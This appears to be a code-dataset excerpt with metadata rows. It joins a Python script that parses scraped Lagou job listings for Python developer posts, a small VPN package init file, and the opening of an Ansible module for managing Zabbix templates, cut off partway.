data-lg-tj-abt="dm-csearch-useUserAllInterest|0"><img src="//static.lagou.com/thumbnail_120x120/i/image2/M00/18/B4/CgoB5ln71t2ADbc3AABFDELpI7U021.jpg" alt="博奥特科技" width="60" height="60"></a> </div> </div> <div class="list_item_bot"> <div class="li_b_l"> <span>金融</span> <span>Java</span> <span>cobol</span> </div> <div class="li_b_r">“发展前景好,双休,互联网金融”</div> </div> </li> <li class="con_list_item default_list" data-index="5" data-positionid="2889252" data-salary="15k-30k" data-company="万科物业" data-positionname="Python开发工程师" data-companyid="8350" data-hrid="7279982" data-tpladword="0"> <div class="list_item_top"> <div class="position"> <div class="p_top"> <a class="position_link" href="https://www.lagou.com/jobs/2889252.html" target="_blank" data-index="5" data-lg-tj-id="8E00" data-lg-tj-no=" 0106 " data-lg-tj-cid="2889252" data-lg-tj-abt="dm-csearch-useUserAllInterest|0"> <h3 style="max-width: 180px;">Python开发工程师</h3> <span class="add">[<em>上梅林</em>]</span> </a> <span class="format-time">2天前发布</span> <input type="hidden" class="hr_portrait" value=""> <input type="hidden" class="hr_name" value="xiongx04"> <input type="hidden" class="hr_position" value=""> <input type="hidden" class="target_hr" value="7279982"> <input type="hidden" class="target_position" value="2889252"> <div class="chat_me" data-lg-tj-id="1WI0" data-lg-tj-no="0106" data-lg-tj-cid="8350" data-lg-tj-track-code="search_code" data-lg-tj-track-type="1"></div> </div> <div class="p_bot"> <div class="li_b_l"> <span class="money">15k-30k</span> <!--<i></i>-->经验3-5年 / 本科 </div> </div> </div> <div class="company"> <div class="company_name"> <a href="https://www.lagou.com/gongsi/8350.html" target="_blank" data-lg-tj-id="8F00" data-lg-tj-no=" 0106 " data-lg-tj-cid="8350" data-lg-tj-abt="dm-csearch-useUserAllInterest|0">万科物业</a><i class="company_mark"><span>该企业已上传营业执照并通过资质验证审核</span></i> </div> <div class="industry"> O2O,生活服务 / 不需要融资 </div> </div> <div class="com_logo"> <a href="https://www.lagou.com/gongsi/8350.html" target="_blank" data-lg-tj-id="8G00" data-lg-tj-no=" 0106 " data-lg-tj-cid="8350" data-lg-tj-abt="dm-csearch-useUserAllInterest|0"><img src="//static.lagou.com/thumbnail_120x120/image2/M00/08/03/CgqLKVYBEtqAD2vhAAARnNY0kzg058.png" alt="万科物业" width="60" height="60"></a> </div> </div> <div class="list_item_bot"> <div class="li_b_l"> <span>资深</span> <span>高级</span> <span>中级</span> <span>后端开发</span> <span>redis</span> </div> <div class="li_b_r">“平台好,空间大”</div> </div> </li> <li class="con_list_item default_list" data-index="6" data-positionid="2786718" data-salary="10k-15k" data-company="环球易购" data-positionname="高级python开发工程师" data-companyid="83025" data-hrid="2117758" data-tpladword="0"> <div class="list_item_top"> <div class="position"> <div class="p_top"> <a class="position_link" href="https://www.lagou.com/jobs/2786718.html" target="_blank" data-index="6" data-lg-tj-id="8E00" data-lg-tj-no=" 0107 " data-lg-tj-cid="2786718" data-lg-tj-abt="dm-csearch-useUserAllInterest|0"> <h3 style="max-width: 180px;">高级python开发工程师</h3> <span class="add">[<em>南山区</em>]</span> </a> <span class="format-time">1天前发布</span> <input type="hidden" class="hr_portrait" value="i/image2/M00/1E/F1/CgoB5loL-aGASIqDAAATxYblCtQ334.jpg"> <input type="hidden" class="hr_name" value="Hipson"> <input type="hidden" class="hr_position" value="首席神秘官"> <input type="hidden" class="target_hr" value="2117758"> <input type="hidden" class="target_position" value="2786718"> <div class="chat_me" data-lg-tj-id="1WI0" data-lg-tj-no="0107" data-lg-tj-cid="83025" data-lg-tj-track-code="search_code" data-lg-tj-track-type="1"></div> </div> <div class="p_bot"> <div class="li_b_l"> <span class="money">10k-15k</span> <!--<i></i>-->经验3-5年 / 大专 </div> </div> </div> <div class="company"> <div class="company_name"> <a href="https://www.lagou.com/gongsi/83025.html" target="_blank" data-lg-tj-id="8F00" data-lg-tj-no=" 0107 " data-lg-tj-cid="83025" data-lg-tj-abt="dm-csearch-useUserAllInterest|0">环球易购</a><i class="company_mark"><span>该企业已上传营业执照并通过资质验证审核</span></i> </div> <div class="industry"> 电子商务 / 上市公司 </div> </div> <div class="com_logo"> <a href="https://www.lagou.com/gongsi/83025.html" target="_blank" data-lg-tj-id="8G00" data-lg-tj-no=" 0107 " data-lg-tj-cid="83025" data-lg-tj-abt="dm-csearch-useUserAllInterest|0"><img src="//static.lagou.com/thumbnail_120x120/image1/M00/38/9F/CgYXBlWmIt6Af8k5AABvK21LZWM490.jpg?cc=0.211507520172745" alt="环球易购" width="60" height="60"></a> </div> </div> <div class="list_item_bot"> <div class="li_b_l"> <span>软件开发</span> </div> <div class="li_b_r">“上市公司 公司规模大 发展机会多”</div> </div> </li> <li class="con_list_item default_list" data-index="7" data-positionid="3325916" data-salary="15k-23k" data-company="晶泰科技" data-positionname="高级Python开发工程师" data-companyid="76066" data-hrid="5281055" data-tpladword="0"> <div class="list_item_top"> <div class="position"> <div class="p_top"> <a class="position_link" href="https://www.lagou.com/jobs/3325916.html" target="_blank" data-index="7" data-lg-tj-id="8E00" data-lg-tj-no=" 0108 " data-lg-tj-cid="3325916" data-lg-tj-abt="dm-csearch-useUserAllInterest|0"> <h3 style="max-width: 180px;">高级Python开发工程师</h3> <span class="add">[<em>香蜜湖</em>]</span> </a> <span class="format-time">2天前发布</span> <input type="hidden" class="hr_portrait" value="i/image/M00/48/46/CgpFT1loITKAe1YZAAD7YMAGvnI602.jpg"> <input type="hidden" class="hr_name" value="李丹慧"> <input type="hidden" class="hr_position" value="HR经理"> <input type="hidden" class="target_hr" value="5281055"> <input type="hidden" class="target_position" value="3325916"> <div class="chat_me" data-lg-tj-id="1WI0" data-lg-tj-no="0108" data-lg-tj-cid="76066" data-lg-tj-track-code="search_code" data-lg-tj-track-type="1"></div> </div> <div class="p_bot"> <div class="li_b_l"> <span class="money">15k-23k</span> <!--<i></i>-->经验1-3年 / 本科 </div> </div> </div> <div class="company"> <div class="company_name"> <a href="https://www.lagou.com/gongsi/76066.html" target="_blank" data-lg-tj-id="8F00" data-lg-tj-no=" 0108 " data-lg-tj-cid="76066" data-lg-tj-abt="dm-csearch-useUserAllInterest|0">晶泰科技</a><i class="company_mark"><span>该企业已上传营业执照并通过资质验证审核</span></i> </div> <div class="industry"> 企业服务,医疗健康 / B轮 </div> </div> <div class="com_logo"> <a href="https://www.lagou.com/gongsi/76066.html" target="_blank" data-lg-tj-id="8G00" data-lg-tj-no=" 0108 " data-lg-tj-cid="76066" data-lg-tj-abt="dm-csearch-useUserAllInterest|0"><img src="//static.lagou.com/thumbnail_120x120/i/image/M00/46/CE/CgqKkVeNuE-AMgmGAACJzPxVN30374.jpg" alt="晶泰科技" width="60" height="60"></a> </div> </div> <div class="list_item_bot"> <div class="li_b_l"> <span>云计算</span> <span>后端开发</span> <span>web</span> <span>Go</span> <span>django</span> </div> <div class="li_b_r">“大牛多,公司氛围好,周末双休,成长快”</div> </div> </li> <li class="con_list_item default_list" data-index="8" data-positionid="3727987" data-salary="14k-20k" data-company="盖威" data-positionname="Python开发工程师" data-companyid="3956" data-hrid="5713991" data-tpladword="0"> <div class="list_item_top"> <div class="position"> <div class="p_top"> <a class="position_link" href="https://www.lagou.com/jobs/3727987.html" target="_blank" data-index="8" data-lg-tj-id="8E00" data-lg-tj-no=" 0109 " data-lg-tj-cid="3727987" data-lg-tj-abt="dm-csearch-useUserAllInterest|0"> <h3 style="max-width: 180px;">Python开发工程师</h3> <span class="add">[<em>科技园</em>]</span> </a> <span class="format-time">3天前发布</span> <input type="hidden" class="hr_portrait" value=""> <input type="hidden" class="hr_name" value="hr-gw"> <input type="hidden" class="hr_position" value="HR经理"> <input type="hidden" class="target_hr" value="5713991"> <input type="hidden" class="target_position" value="3727987"> <div class="chat_me" data-lg-tj-id="1WI0" data-lg-tj-no="0109" data-lg-tj-cid="3956" data-lg-tj-track-code="search_code" data-lg-tj-track-type="1"></div> </div> <div class="p_bot"> <div class="li_b_l"> <span class="money">14k-20k</span> <!--<i></i>-->经验3-5年 / 本科 </div> </div> </div> <div class="company"> <div class="company_name"> <a href="https://www.lagou.com/gongsi/3956.html" target="_blank" data-lg-tj-id="8F00" data-lg-tj-no=" 0109 " data-lg-tj-cid="3956" data-lg-tj-abt="dm-csearch-useUserAllInterest|0">盖威</a><i class="company_mark"><span>该企业已上传营业执照并通过资质验证审核</span></i> </div> <div class="industry"> 金融 / 不需要融资 </div> </div> <div class="com_logo"> <a href="https://www.lagou.com/gongsi/3956.html" target="_blank" data-lg-tj-id="8G00" data-lg-tj-no=" 0109 " data-lg-tj-cid="3956" data-lg-tj-abt="dm-csearch-useUserAllInterest|0"><img src="//static.lagou.com/thumbnail_120x120/image1/M00/00/0A/Cgo8PFTUWBWAJ-eQAAA1pEtnnYo973.png" alt="盖威" width="60" height="60"></a> </div> </div> <div class="list_item_bot"> <div class="li_b_l"> <span>linux</span> <span>C++</span> </div> <div class="li_b_r">“福利待遇好”</div> </div> </li> <li class="con_list_item default_list" data-index="9" data-positionid="2010228" data-salary="15k-25k" data-company="极光" data-positionname="高级Python开发工程师" data-companyid="917" data-hrid="2153176" data-tpladword="0"> <div class="list_item_top"> <div class="position"> <div class="p_top"> <a class="position_link" href="https://www.lagou.com/jobs/2010228.html" target="_blank" data-index="9" data-lg-tj-id="8E00" data-lg-tj-no=" 0110 " data-lg-tj-cid="2010228" data-lg-tj-abt="dm-csearch-useUserAllInterest|0"> <h3 style="max-width: 180px;">高级Python开发工程师</h3> <span class="add">[<em>南头</em>]</span> </a> <span class="format-time">2天前发布</span> <input type="hidden" class="hr_portrait" value="i/image2/M00/0A/38/CgotOVncPOGAR2E7AABUArhVY0U298.jpg"> <input type="hidden" class="hr_name" value="Maggie"> <input type="hidden" class="hr_position" value="HRBP"> <input type="hidden" class="target_hr" value="2153176"> <input type="hidden" class="target_position" value="2010228"> <div class="chat_me" data-lg-tj-id="1WI0" data-lg-tj-no="0110" data-lg-tj-cid="917" data-lg-tj-track-code="search_code" data-lg-tj-track-type="1"></div> <i class="pos_icon pos_icon_12"></i></div> <div class="p_bot"> <div class="li_b_l"> <span class="money">15k-25k</span> <!--<i></i>-->经验3-5年 / 本科 </div> </div> </div> <div class="company"> <div class="company_name"> <a href="https://www.lagou.com/gongsi/917.html" target="_blank" data-lg-tj-id="8F00" data-lg-tj-no=" 0110 " data-lg-tj-cid="917" data-lg-tj-abt="dm-csearch-useUserAllInterest|0">极光</a><i class="company_mark"><span>该企业已上传营业执照并通过资质验证审核</span></i> </div> <div class="industry"> 移动互联网,数据服务 / D轮及以上 </div> </div> <div class="com_logo"> <a href="https://www.lagou.com/gongsi/917.html" target="_blank" data-lg-tj-id="8G00" data-lg-tj-no=" 0110 " data-lg-tj-cid="917" data-lg-tj-abt="dm-csearch-useUserAllInterest|0"><img src="//static.lagou.com/thumbnail_120x120/i/image/M00/37/20/CgqKkVdfms6Ac6dNAABY3gBvuqI944.jpg" alt="极光" width="60" height="60"></a> </div> </div> <div class="list_item_bot"> <div class="li_b_l"> <span>云计算</span> <span>linux</span> <span>云平台</span> <span>django</span> </div> <div class="li_b_r">“五险一金、14薪/年、下午茶、工作餐等等”</div> </div> </li> <li class="con_list_item default_list" data-index="10" data-positionid="2022151" data-salary="20k-35k" data-company="航仕科技" data-positionname="Python开发" data-companyid="129877" data-hrid="5095526" data-tpladword="0"> <div class="list_item_top"> <div class="position"> <div class="p_top"> <a class="position_link" href="https://www.lagou.com/jobs/2022151.html" target="_blank" data-index="10" data-lg-tj-id="8E00" data-lg-tj-no=" 0111 " data-lg-tj-cid="2022151" data-lg-tj-abt="dm-csearch-useUserAllInterest|0"> <h3 style="max-width: 180px;">Python开发</h3> <span class="add">[<em>科技园</em>]</span> </a> <span class="format-time">2017-11-21</span> <input type="hidden" class="hr_portrait" value=""> <input type="hidden" class="hr_name" value="hr"> <input type="hidden" class="hr_position" value="高级招聘经理"> <input type="hidden" class="target_hr" value="5095526"> <input type="hidden" class="target_position" value="2022151"> <div class="chat_me" data-lg-tj-id="1WI0" data-lg-tj-no="0111" data-lg-tj-cid="129877" data-lg-tj-track-code="search_code" data-lg-tj-track-type="1"></div> </div> <div class="p_bot"> <div class="li_b_l"> <span class="money">20k-35k</span> <!--<i></i>-->经验3-5年 / 本科 </div> </div> </div> <div class="company"> <div class="company_name"> <a href="https://www.lagou.com/gongsi/129877.html" target="_blank" data-lg-tj-id="8F00" data-lg-tj-no=" 0111 " data-lg-tj-cid="129877" data-lg-tj-abt="dm-csearch-useUserAllInterest|0">航仕科技</a><i class="company_mark"><span>该企业已上传营业执照并通过资质验证审核</span></i> </div> <div class="industry"> 移动互联网,O2O / C轮 </div> </div> <div class="com_logo"> <a href="https://www.lagou.com/gongsi/129877.html" target="_blank" data-lg-tj-id="8G00" data-lg-tj-no=" 0111 " data-lg-tj-cid="129877" data-lg-tj-abt="dm-csearch-useUserAllInterest|0"><img src="//static.lagou.com/thumbnail_120x120/i/image/M00/2C/9A/Cgp3O1c5oTuAVfXXAABDG8Kg38w820.jpg" alt="航仕科技" width="60" height="60"></a> </div> </div> <div class="list_item_bot"> <div class="li_b_l"> <span>年底双薪</span> <span>午餐补助</span> <span>专项奖金</span> <span>绩效奖金</span> </div> <div class="li_b_r">“BAT的薪资福利待遇,更有技术大牛传授技术”</div> </div> </li> <li class="con_list_item default_list" data-index="11" data-positionid="3759498" data-salary="15k-30k" data-company="Minieye" data-positionname="python工程师" data-companyid="124262" data-hrid="4784940" data-tpladword="0"> <div class="list_item_top"> <div class="position"> <div class="p_top"> <a class="position_link" href="https://www.lagou.com/jobs/3759498.html" target="_blank" data-index="11" data-lg-tj-id="8E00" data-lg-tj-no=" 0112 " data-lg-tj-cid="3759498" data-lg-tj-abt="dm-csearch-useUserAllInterest|0"> <h3 style="max-width: 180px;">python工程师</h3> <span class="add">[<em>南山区</em>]</span> </a> <span class="format-time">12:39发布</span> <input type="hidden" class="hr_portrait" value="i/image/M00/6C/B8/CgpEMlmtQ92AOPnVAACbmIFfngQ360.jpg"> <input type="hidden" class="hr_name" value="HRM"> <input type="hidden" class="hr_position" value=""> <input type="hidden" class="target_hr" value="4784940"> <input type="hidden" class="target_position" value="3759498"> <div class="chat_me" data-lg-tj-id="1WI0" data-lg-tj-no="0112" data-lg-tj-cid="124262" data-lg-tj-track-code="search_code" data-lg-tj-track-type="1"></div> </div> <div class="p_bot"> <div class="li_b_l"> <span class="money">15k-30k</span> <!--<i></i>-->经验1-3年 / 本科 </div> </div> </div> <div class="company"> <div class="company_name"> <a href="https://www.lagou.com/gongsi/124262.html" target="_blank" data-lg-tj-id="8F00" data-lg-tj-no=" 0112 " data-lg-tj-cid="124262" data-lg-tj-abt="dm-csearch-useUserAllInterest|0">Minieye</a><i class="company_mark"><span>该企业已上传营业执照并通过资质验证审核</span></i> </div> <div class="industry"> 硬件,其他 / A轮 </div> </div> <div class="com_logo"> <a href="https://www.lagou.com/gongsi/124262.html" target="_blank" data-lg-tj-id="8G00" data-lg-tj-no=" 0112 " data-lg-tj-cid="124262" data-lg-tj-abt="dm-csearch-useUserAllInterest|0"><img src="//static.lagou.com/thumbnail_120x120/i/image/M00/B1/8D/CgqKkVi5Jd6AA65GAAAmAaWjB9U423.png" alt="Minieye" width="60" height="60"></a> </div> </div> <div class="list_item_bot"> <div class="li_b_l"> <span>无人驾驶</span> <span>国际标准</span> <span>车厂合作</span> <span>海归团队</span> </div> <div class="li_b_r">“无人驾驶,车厂合作,扁平化管理,股票期权”</div> </div> </li> <li class="con_list_item default_list" data-index="12" data-positionid="2268991" data-salary="15k-30k" data-company="糗事百科" data-positionname="Python" data-companyid="1015" data-hrid="94398" data-tpladword="0"> <div class="list_item_top"> <div class="position"> <div class="p_top"> <a class="position_link" href="https://www.lagou.com/jobs/2268991.html" target="_blank" data-index="12" data-lg-tj-id="8E00" data-lg-tj-no=" 0113 " data-lg-tj-cid="2268991" data-lg-tj-abt="dm-csearch-useUserAllInterest|0"> <h3 style="max-width: 180px;">Python</h3> <span class="add">[<em>科技园</em>]</span> </a> <span class="format-time">2天前发布</span> <input type="hidden" class="hr_portrait" value="image1/M00/1C/89/Cgo8PFUmLZ-AJRIkAAAgw3YTWBk532.png"> <input type="hidden" class="hr_name" value="糗百招聘"> <input type="hidden" class="hr_position" value="招聘HR"> <input type="hidden" class="target_hr" value="94398"> <input type="hidden" class="target_position" value="2268991"> <div class="chat_me" data-lg-tj-id="1WI0" data-lg-tj-no="0113" data-lg-tj-cid="1015" data-lg-tj-track-code="search_code" data-lg-tj-track-type="1"></div> <i class="pos_icon pos_icon_12"></i></div> <div class="p_bot"> <div class="li_b_l"> <span class="money">15k-30k</span> <!--<i></i>-->经验3-5年 / 本科 </div> </div> </div> <div class="company"> <div class="company_name"> <a href="https://www.lagou.com/gongsi/1015.html" target="_blank" data-lg-tj-id="8F00" data-lg-tj-no=" 0113 " data-lg-tj-cid="1015" data-lg-tj-abt="dm-csearch-useUserAllInterest|0">糗事百科</a><i class="company_mark"><span>该企业已上传营业执照并通过资质验证审核</span></i> </div> <div class="industry"> 移动互联网 / A轮 </div> </div> <div class="com_logo"> <a href="https://www.lagou.com/gongsi/1015.html" target="_blank" data-lg-tj-id="8G00" data-lg-tj-no=" 0113 " data-lg-tj-cid="1015" data-lg-tj-abt="dm-csearch-useUserAllInterest|0"><img src="//static.lagou.com/thumbnail_120x120/image1/M00/00/05/CgYXBlTUWAGAY0KwAABsvAoi2t4880.png" alt="糗事百科" width="60" height="60"></a> </div> </div> <div class="list_item_bot"> <div class="li_b_l"> <span>文化娱乐</span> </div> <div class="li_b_r">“老司机来开车”</div> </div> </li> <li class="con_list_item default_list" data-index="13" data-positionid="3834269" data-salary="15k-25k" data-company="通力互联" data-positionname="Python开发工程师" data-companyid="123777" data-hrid="4752170" data-tpladword="0"> <div class="list_item_top"> <div class="position"> <div class="p_top"> <a class="position_link" href="https://www.lagou.com/jobs/3834269.html" target="_blank" data-index="13" data-lg-tj-id="8E00" data-lg-tj-no=" 0114 " data-lg-tj-cid="3834269" data-lg-tj-abt="dm-csearch-useUserAllInterest|0"> <h3 style="max-width: 180px;">Python开发工程师</h3> <span class="add">[<em>草埔</em>]</span> </a> <span class="format-time">1天前发布</span> <input type="hidden" class="hr_portrait" value=""> <input type="hidden" class="hr_name" value="李龙辉"> <input type="hidden" class="hr_position" value="招聘经理"> <input type="hidden" class="target_hr" value="4752170"> <input type="hidden" class="target_position" value="3834269"> <div class="chat_me" data-lg-tj-id="1WI0" data-lg-tj-no="0114" data-lg-tj-cid="123777" data-lg-tj-track-code="search_code" data-lg-tj-track-type="1"></div> </div> <div class="p_bot"> <div class="li_b_l"> <span class="money">15k-25k</span> <!--<i></i>-->经验5-10年 / 大专 </div> </div> </div> <div class="company"> <div class="company_name"> <a href="https://www.lagou.com/gongsi/123777.html" target="_blank" data-lg-tj-id="8F00" data-lg-tj-no=" 0114 " data-lg-tj-cid="123777" data-lg-tj-abt="dm-csearch-useUserAllInterest|0">通力互联</a><i class="company_mark"><span>该企业已上传营业执照并通过资质验证审核</span></i> </div> <div class="industry"> 电子商务,企业服务 / 不需要融资 </div> </div> <div class="com_logo"> <a href="https://www.lagou.com/gongsi/123777.html" target="_blank" data-lg-tj-id="8G00" data-lg-tj-no=" 0114 " data-lg-tj-cid="123777" data-lg-tj-abt="dm-csearch-useUserAllInterest|0"><img src="//static.lagou.com/thumbnail_120x120/i/image/M00/2E/03/CgqKkVc9jmCAI8DpAAD09YLPnBk157.png" alt="通力互联" width="60" height="60"></a> </div> </div> <div class="list_item_bot"> <div class="li_b_l"> <span>云计算</span> <span>Java</span> <span>SVN</span> </div> <div class="li_b_r">“高薪高福利”</div> </div> </li> <li class="con_list_item default_list" data-index="14" data-positionid="3836101" data-salary="12k-18k" data-company="金证股份" data-positionname="Python开发" data-companyid="25317" data-hrid="5715150" data-tpladword="0"> <div class="list_item_top"> <div class="position"> <div class="p_top"> <a class="position_link" href="https://www.lagou.com/jobs/3836101.html" target="_blank" data-index="14" data-lg-tj-id="8E00" data-lg-tj-no=" 0115 " data-lg-tj-cid="3836101" data-lg-tj-abt="dm-csearch-useUserAllInterest|0"> <h3 style="max-width: 180px;">Python开发</h3> <span class="add">[<em>福田区</em>]</span> </a> <span class="format-time">2天前发布</span> <input type="hidden" class="hr_portrait" value=""> <input type="hidden" class="hr_name" value="lis"> <input type="hidden" class="hr_position" value="运营总监"> <input type="hidden" class="target_hr" value="5715150"> <input type="hidden" class="target_position" value="3836101"> <div class="chat_me" data-lg-tj-id="1WI0" data-lg-tj-no="0115" data-lg-tj-cid="25317" data-lg-tj-track-code="search_code" data-lg-tj-track-type="1"></div> <i class="pos_icon pos_icon_12"></i></div> <div class="p_bot"> <div class="li_b_l"> <span class="money">12k-18k</span> <!--<i></i>-->经验3-5年 / 大专 </div> </div> </div> <div class="company"> <div class="company_name"> <a href="https://www.lagou.com/gongsi/25317.html" target="_blank" data-lg-tj-id="8F00" data-lg-tj-no=" 0115 " data-lg-tj-cid="25317" data-lg-tj-abt="dm-csearch-useUserAllInterest|0">金证股份</a><i class="company_mark"><span>该企业已上传营业执照并通过资质验证审核</span></i> </div> <div class="industry"> 金融 / 上市公司 </div> </div> <div class="com_logo"> <a href="https://www.lagou.com/gongsi/25317.html" target="_blank" data-lg-tj-id="8G00" data-lg-tj-no=" 0115 " data-lg-tj-cid="25317" data-lg-tj-abt="dm-csearch-useUserAllInterest|0"><img src="//static.lagou.com/thumbnail_120x120/image1/M00/00/34/Cgo8PFTUXJOAMEEpAAAroeFn454603.jpg" alt="金证股份" width="60" height="60"></a> </div> </div> <div class="list_item_bot"> <div class="li_b_l"> <span>统计</span> <span>财经</span> <span>Perl</span> <span>自然语言处理</span> </div> <div class="li_b_r">“上市公司,大型项目,年度调薪,薪资福利好”</div> </div> </li> </ul> """ html = etree.HTML(text) #将字符串解析为HTML文档 #序列化 HTML文档 result = etree.tostring(html) print(result)
26.759594
249
0.485006
86f862c37f1fc4105b32506c2611e1984f6d6818
162
py
Python
sentinel/vpn/__init__.py
allagog0x01/sentwg
52285ecf2b03c30a78901a29a7af96c8ab5764c8
[ "Apache-2.0" ]
null
null
null
sentinel/vpn/__init__.py
allagog0x01/sentwg
52285ecf2b03c30a78901a29a7af96c8ab5764c8
[ "Apache-2.0" ]
null
null
null
sentinel/vpn/__init__.py
allagog0x01/sentwg
52285ecf2b03c30a78901a29a7af96c8ab5764c8
[ "Apache-2.0" ]
null
null
null
# coding=utf-8 from .helpers import disconnect_client from .helpers import get_sessions from .helpers import update_session_data from .wireguard import wireguard
27
40
0.845679
86fb659f884277de17b93c2afa6b5604f63fec64
30,692
py
Python
exercises/networking_selfpaced/networking-workshop/collections/ansible_collections/community/general/plugins/modules/zabbix_template.py
tr3ck3r/linklight
5060f624c235ecf46cb62cefcc6bddc6bf8ca3e7
[ "MIT" ]
null
null
null
exercises/networking_selfpaced/networking-workshop/collections/ansible_collections/community/general/plugins/modules/zabbix_template.py
tr3ck3r/linklight
5060f624c235ecf46cb62cefcc6bddc6bf8ca3e7
[ "MIT" ]
null
null
null
exercises/networking_selfpaced/networking-workshop/collections/ansible_collections/community/general/plugins/modules/zabbix_template.py
tr3ck3r/linklight
5060f624c235ecf46cb62cefcc6bddc6bf8ca3e7
[ "MIT" ]
null
null
null
#!/usr/bin/python # -*- coding: utf-8 -*- # (c) 2017, sookido # GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt) from __future__ import absolute_import, division, print_function __metaclass__ = type ANSIBLE_METADATA = {'metadata_version': '1.1', 'status': ['preview'], 'supported_by': 'community'} DOCUMENTATION = r''' --- module: zabbix_template short_description: Create/update/delete/dump Zabbix template description: - This module allows you to create, modify, delete and dump Zabbix templates. - Multiple templates can be created or modified at once if passing JSON or XML to module. author: - "sookido (@sookido)" - "Logan Vig (@logan2211)" - "Dusan Matejka (@D3DeFi)" requirements: - "python >= 2.6" - "zabbix-api >= 0.5.4" options: template_name: description: - Name of Zabbix template. - Required when I(template_json) or I(template_xml) are not used. - Mutually exclusive with I(template_json) and I(template_xml). required: false type: str template_json: description: - JSON dump of templates to import. - Multiple templates can be imported this way. - Mutually exclusive with I(template_name) and I(template_xml). required: false type: json template_xml: description: - XML dump of templates to import. - Multiple templates can be imported this way. - You are advised to pass XML structure matching the structure used by your version of Zabbix server. - Custom XML structure can be imported as long as it is valid, but may not yield consistent idempotent results on subsequent runs. - Mutually exclusive with I(template_name) and I(template_json). required: false type: str template_groups: description: - List of host groups to add template to when template is created. - Replaces the current host groups the template belongs to if the template is already present. - Required when creating a new template with C(state=present) and I(template_name) is used. Not required when updating an existing template. required: false type: list elements: str link_templates: description: - List of template names to be linked to the template. - Templates that are not specified and are linked to the existing template will be only unlinked and not cleared from the template. required: false type: list elements: str clear_templates: description: - List of template names to be unlinked and cleared from the template. - This option is ignored if template is being created for the first time. required: false type: list elements: str macros: description: - List of user macros to create for the template. - Macros that are not specified and are present on the existing template will be replaced. - See examples on how to pass macros. required: false type: list elements: dict suboptions: name: description: - Name of the macro. - Must be specified in {$NAME} format. type: str value: description: - Value of the macro. type: str dump_format: description: - Format to use when dumping template with C(state=dump). - This option is deprecated and will eventually be removed in 2.14. required: false choices: [json, xml] default: "json" type: str omit_date: description: - Removes the date field for the exported/dumped template - Requires C(state=dump) required: false type: bool default: false state: description: - Required state of the template. - On C(state=present) template will be created/imported or updated depending if it is already present. - On C(state=dump) template content will get dumped into required format specified in I(dump_format). - On C(state=absent) template will be deleted. - The C(state=dump) is deprecated and will eventually be removed in 2.14. The M(zabbix_template_info) module should be used instead. required: false choices: [present, absent, dump] default: "present" type: str extends_documentation_fragment: - community.general.zabbix ''' EXAMPLES = r''' --- - name: Create a new Zabbix template linked to groups, macros and templates local_action: module: zabbix_template server_url: http://127.0.0.1 login_user: username login_password: password template_name: ExampleHost template_groups: - Role - Role2 link_templates: - Example template1 - Example template2 macros: - macro: '{$EXAMPLE_MACRO1}' value: 30000 - macro: '{$EXAMPLE_MACRO2}' value: 3 - macro: '{$EXAMPLE_MACRO3}' value: 'Example' state: present - name: Unlink and clear templates from the existing Zabbix template local_action: module: zabbix_template server_url: http://127.0.0.1 login_user: username login_password: password template_name: ExampleHost clear_templates: - Example template3 - Example template4 state: present - name: Import Zabbix templates from JSON local_action: module: zabbix_template server_url: http://127.0.0.1 login_user: username login_password: password template_json: "{{ lookup('file', 'zabbix_apache2.json') }}" state: present - name: Import Zabbix templates from XML local_action: module: zabbix_template server_url: http://127.0.0.1 login_user: username login_password: password template_xml: "{{ lookup('file', 'zabbix_apache2.json') }}" state: present - name: Import Zabbix template from Ansible dict variable zabbix_template: login_user: username login_password: password server_url: http://127.0.0.1 template_json: zabbix_export: version: '3.2' templates: - name: Template for Testing description: 'Testing template import' template: Test Template groups: - name: Templates applications: - name: Test Application state: present - name: Configure macros on the existing Zabbix template local_action: module: zabbix_template server_url: http://127.0.0.1 login_user: username login_password: password template_name: Template macros: - macro: '{$TEST_MACRO}' value: 'Example' state: present - name: Delete Zabbix template local_action: module: zabbix_template server_url: http://127.0.0.1 login_user: username login_password: password template_name: Template state: absent - name: Dump Zabbix template as JSON local_action: module: zabbix_template server_url: http://127.0.0.1 login_user: username login_password: password template_name: Template omit_date: yes state: dump register: template_dump - name: Dump Zabbix template as XML local_action: module: zabbix_template server_url: http://127.0.0.1 login_user: username login_password: password template_name: Template dump_format: xml omit_date: false state: dump register: template_dump ''' RETURN = r''' --- template_json: description: The JSON dump of the template returned: when state is dump and omit_date is no type: str sample: { "zabbix_export":{ "date":"2017-11-29T16:37:24Z", "templates":[{ "templates":[], "description":"", "httptests":[], "screens":[], "applications":[], "discovery_rules":[], "groups":[{"name":"Templates"}], "name":"Test Template", "items":[], "macros":[], "template":"test" }], "version":"3.2", "groups":[{ "name":"Templates" }] } } template_xml: description: dump of the template in XML representation returned: when state is dump, dump_format is xml and omit_date is yes type: str sample: |- <?xml version="1.0" ?> <zabbix_export> <version>4.2</version> <groups> <group> <name>Templates</name> </group> </groups> <templates> <template> <template>test</template> <name>Test Template</name> <description/> <groups> <group> <name>Templates</name> </group> </groups> <applications/> <items/> <discovery_rules/> <httptests/> <macros/> <templates/> <screens/> <tags/> </template> </templates> </zabbix_export> ''' import atexit import json import traceback import xml.etree.ElementTree as ET from distutils.version import LooseVersion from ansible.module_utils.basic import AnsibleModule, missing_required_lib from ansible.module_utils._text import to_native try: from zabbix_api import ZabbixAPI, ZabbixAPIException HAS_ZABBIX_API = True except ImportError: ZBX_IMP_ERR = traceback.format_exc() HAS_ZABBIX_API = False class Template(object): def __init__(self, module, zbx): self._module = module self._zapi = zbx # check if host group exists def check_host_group_exist(self, group_names): for group_name in group_names: result = self._zapi.hostgroup.get({'filter': {'name': group_name}}) if not result: self._module.fail_json(msg="Hostgroup not found: %s" % group_name) return True # get group ids by group names def get_group_ids_by_group_names(self, group_names): group_ids = [] if group_names is None or len(group_names) == 0: return group_ids if self.check_host_group_exist(group_names): group_list = self._zapi.hostgroup.get( {'output': 'extend', 'filter': {'name': group_names}}) for group in group_list: group_id = group['groupid'] group_ids.append({'groupid': group_id}) return group_ids def get_template_ids(self, template_list): template_ids = [] if template_list is None or len(template_list) == 0: return template_ids for template in template_list: template_list = self._zapi.template.get( {'output': 'extend', 'filter': {'host': template}}) if len(template_list) < 1: continue else: template_id = template_list[0]['templateid'] template_ids.append(template_id) return template_ids def add_template(self, template_name, group_ids, link_template_ids, macros): if self._module.check_mode: self._module.exit_json(changed=True) self._zapi.template.create({'host': template_name, 'groups': group_ids, 'templates': link_template_ids, 'macros': macros}) def check_template_changed(self, template_ids, template_groups, link_templates, clear_templates, template_macros, template_content, template_type): """Compares template parameters to already existing values if any are 